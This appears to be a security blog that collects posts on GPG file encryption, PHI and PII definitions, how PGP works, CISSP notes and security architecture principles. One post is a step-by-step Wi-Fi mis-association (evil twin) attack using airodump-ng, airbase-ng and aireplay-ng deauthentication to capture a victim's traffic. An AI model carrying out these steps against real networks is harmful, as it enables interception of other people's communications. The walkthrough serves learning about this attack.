How to encrypt and decrypt files using OpenPGP encryption

Some useful OpenPGP commands on linux.

Generating keys:
gpg2 --gen-key

Listing keys:
gpg2 --list-secret-keys

Exporting public key:
gpg --armor --export you@domain.com > mypublickey.asc
Or exporting to the public key to a key server:
gpg --keyserver search.keyserver.net --send-key you@domain.com

Exporting private key:
gpg2 --armor --export-secret-keys your_email@domain.com > myprivatekey.asc

Encrypting a file:
gpg2 --encrypt file.txt --output file.gpg

Importing the public key on the recipient PC:

gpg2 --import senderpublickey.asc

Decrypting a file:

gpg2 --output file.txt --decrypt file.gpg

Mis-Association attacks on wireless

The technique of mis-association attack is to get a computer connect to your Kali machine using one of the old Wirelesses that it has connected before. Or use the same SSID name as is available and has some clients. For example, if a computer was connected to a WIFI network called “Public-wifi” in the past, that name will be discovered and used to attack to the host.

The steps are as below:

• Find one of the wireless SSID names that the victim has connected before using “airodump-ng”
• Set up a new access point with exactly the same name
• Send a de-auth message to the victim to it will be disconnected from the current AP and try to connect again
• As the SSID you created is already on the victim’s list, it will be connected to your created AP.
• You can start capture victim’s traffic!

To achieve this below steps need to be followed:

• airmon-ng start wlan0
• airodump-ng mon0 -- You can see the station is trying to connect to a list of Aps that it has connected before (probe column) - e.g Public-wifi

Note: make sure that SSID is not available on the current list of APs

• airbase-ng -essid “Public-wifi” -c 1 mon0 -- This will make Kali an access point and client can authenticate and connect
• Set up DHCP and other setting as per previous section (Rogue access points)
• Now the client station will try to connect to your computer as it has the same SSID on its database
• If client machine is already connected to another WIFI, start a de-auth attach as below
• aireplay-ng -0 0 -a 22:AF:3A:5E:22:3D mon0 -- Force clients to reauthenticate and connect to our machine
• Monitor the output of airbase-ng command to see when the victim connects

PHI vs PII vs Sensitive information

Protected Health Information (PHI)

Protected Health Information (PHI) is an individual’s health information that is created or received by a health care provider related to the provision of health care by a covered entity that identifies or could reasonably identify the individual. The 18 identifiers that are considered PHI are included in OHRPP Guidance & Procedures: Health Insurance Portability and Accountability Act (HIPAA)

An individual’s personal and health information that is created, received, or maintained by a health care provider or health plan and includes at least one of the 18 personal identifiers listed below in association with the health information:

•          Name
•          Street address
•          All elements of dates except year
•          Telephone number
•          Fax number
•          Email address
•          URL address
•          IP address
•          Social Security number
•          Account numbers
•          License numbers
•          Medical Record number
•          Health plan beneficiary #
•          Device identifiers and their serial numbers
•          Vehicle identifiers and serial number
•          Biometric identifiers (finger and voice prints)
•          Full face photos and other comparable images
•          Any other unique identifying number, code, or characteristic

Limited Data Set - a limited data set can include the following identifiers: a unique number code, or characteristic that does not include any of the above listed identifiers, geographic data (without street address), and/or dates

Personal Identifiable Information (PII)

Personal Identifiable Information (PII) is defined as data or other information which otherwise identifies, an individual or provides information about an individual in a way that is reasonably likely to enable identification of a specific person and make personal information about them known. Personal information includes, but is not limited to, information regarding a person's home or other personal address, social security number, driver's license, marital status, financial information, credit card numbers, bank accounts, parental status, sex, race, religion, political affiliation, personal assets, medical conditions, medical records or test results, home or other personal phone numbers, non-university address, employee number, personnel or student records and so on.

Information about an individual which includes any of the identifiers below:

•          Name
•          Street address
•          All elements of dates except year
•          Telephone number
•          Fax number
•          Email address
•          URL address
•          IP address
•          Social Security number
•          Account number, credit or debit card number, in combination with any required security code, access code or password that would permit access to an individual’s financial account
•          Driver’s License numbers or California or other identification card number
•          Device identifiers and their serial numbers
•          Vehicle identifiers and serial number
•          Biometric identifiers (finger and voice prints)
•          Full face photos and other comparable images
•          Any other unique identifying number, code, or characteristic (e.g., student identification number).

Sensitive Data

• An individual’s first name (or first initial) and last name in combination with any of the following:
• Social Security Number
• Driver’s License Number or California ID card number
• Financial account information such as a credit card number
• Medical Information

How does PGP Work?

PGP combines some of the best features of both conventional and public key cryptography. PGP is a hybrid cryptosystem. When a user encrypts plaintext with PGP, PGP first compresses the plaintext. Data compression saves modem transmission time and disk space and, more importantly, strengthens cryptographic security. 

Most cryptanalysis techniques exploit patterns found in the plaintext to crack the cipher. Compression reduces these patterns in the plaintext, thereby greatly enhancing resistance to cryptanalysis. (Files that are too short to compress or which don’t compress well aren’t compressed.) 

PGP then creates a session key, which is a one-time-only secret key. This key is a random number generated from the random movements of your mouse and the keystrokes you type. This session key works with a very secure, fast conventional encryption algorithm to encrypt the plaintext the result is ciphertext. Once the data is encrypted, the session key is then encrypted to the recipient’s public key. This public key-encrypted session key is transmitted along with the ciphertext to the recipient.

Decryption works in the reverse. The recipient’s copy of PGP uses his or her private key to recover the temporary session key, which PGP then uses to decrypt the conventionally-encrypted ciphertext.

Below image shows how PGP encryption works

Below image shows how PGP decryption works

CISSP Pocket guide check list

Here are my ISC2 CISSP notes.

If you need a quick and summary index of what is required to pass CISSP exam, this would help.

Click here to get the file

GENERIC ARCHITECTURE DESIGN PRINCIPLES

When designing any architecture there are certain principles need to be considered and followed. They will assure the architecture is aligned with business strategy, vision and goals. Usually Enterprise architect team is responsible of defining those principles with senior management help and guidance. Below are some principles to be used when designing security architecture.

• Principle 1: Comprehensive Documentation
• Principle 2: No plan is fool-proof
• Principle 3: Successful business operation supported by reasonable and appropriate controls
• Principle 4: Business requirements require translation into forms that technical architecture designers can form into conceptual models
• Principle 5: It makes no sense to design something the engineers can’t build
• Principle 6: Partial understanding results in incomplete designs
• Principle 7: Use attach trees
• Principles 8: Business and technical users will avoid complex and hard to use security controls
• Principle 9: Testing models and final architecture implementations must take into consideration design
• Principle 10: Ensure architecture constraints are reviewed during the change management process
• Principle 11: Frequently assess risk
• Principle 12: Meeting security requirements means the architecture is compliant with regulatory and best practise constraints

Gartner’s Six Principles of Resilience for Digital Business Risk and Security

There are 6 main principles when talking about information security. These principles first introduced in 2016 by Gartner risk and security division.

Principles are:

• Principle No. 1: Stop Focusing on Check Box Compliance, and Shift to Risk-Based Decision Making
• Security is not the same old beast. Information security must be a top down approach and driven from identified business risk. Risk management and risk analysis is the first big step of any information security work.
• Principle No. 2: Stop Solely Protecting Infrastructure, and Begin Supporting Business Outcomes
• Information security is a business enabler. Security is there to help business achieve its goals and targets. The only way of having a successful information security architecture is to make sure it is aligned with business strategy.
• Principle No. 3: Stop Being a Defender, and Become a Facilitator
• Again, the aim of information security is to facilitate business to hit the targets. Of-course security is important, but if we are blocking business process, it is useless.
• Principle No. 4: Stop Trying to Control Information; Instead, Determine How It Flows
• Big shift in security mind set is moving away from local and limited controls and have a holistic approach looking at flows and process.
• Principle No. 5: Accept the Limits of Technology and Become People-Centric
• These days more and more attacks are result of lack of user awareness. Training people and using resources is as important as having technical controls.
• Principle No. 6: Stop Trying to Perfectly Protect Your Organization, and Invest in Detection and Response
• We all know it is impossible to have a complete safe environment. Threats and vulnerabilities are always there. Proper incident response plan and operation is crucial for any business.